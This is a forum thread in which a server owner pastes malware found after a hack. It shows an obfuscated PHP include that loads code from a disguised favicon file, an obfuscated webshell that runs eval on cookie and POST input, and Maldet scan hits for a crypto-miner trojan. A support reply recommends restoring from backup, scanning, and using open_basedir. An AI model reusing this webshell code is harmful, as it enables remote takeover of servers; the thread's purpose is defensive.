Server hacked: I found these, please advice how to deep scan and detect any vulnerabilities
Server hacked: I found these, please advice how to deep scan and detect any vulnerabilities
1. This is in a index.php file:
<?php
/*3bd6f*/
@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";
/*3bd6f*/
================
2. another PHP file uploaded by hacker:
<?php
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}
===
3. this one lookied like tried to temper the etc/passwd file
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico
FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283
===
4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452
===
<?php
/*3bd6f*/
@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";
/*3bd6f*/
================
2. another PHP file uploaded by hacker:
<?php
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}
===
3. this one lookied like tried to temper the etc/passwd file
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico
FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283
===
4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452
===
-
- Support team
- Posts: 1096
- Joined: Sat Sep 06, 2014 9:58 pm
- Contact:
- Os: Debian 8x
- Web: apache + nginx
Re: Server hacked: I found these, please advice how to deep scan and detect any vulnerabilities
Well,
the information you gave is not complete... Was only one site hacked or you find multiple sites hacked?
It looks more like an insecure site being targetted for malware injections.
You can:
1. Restore your site from a backup and then secure it.
2. Use Clamscan or Maldet to check your site files.
Ensure you have openbasedir restriction in place for each site so that if one is compromised, the hacker cannot crawl thru the other areas of the server
the information you gave is not complete... Was only one site hacked or you find multiple sites hacked?
It looks more like an insecure site being targetted for malware injections.
You can:
1. Restore your site from a backup and then secure it.
2. Use Clamscan or Maldet to check your site files.
Ensure you have openbasedir restriction in place for each site so that if one is compromised, the hacker cannot crawl thru the other areas of the server
Re: Server hacked: I found these, please advice how to deep scan and detect any vulnerabilities
thanks a lot.
I restored all users from backup.
and did further scan and fixed some more issues
I restored all users from backup.
and did further scan and fixed some more issues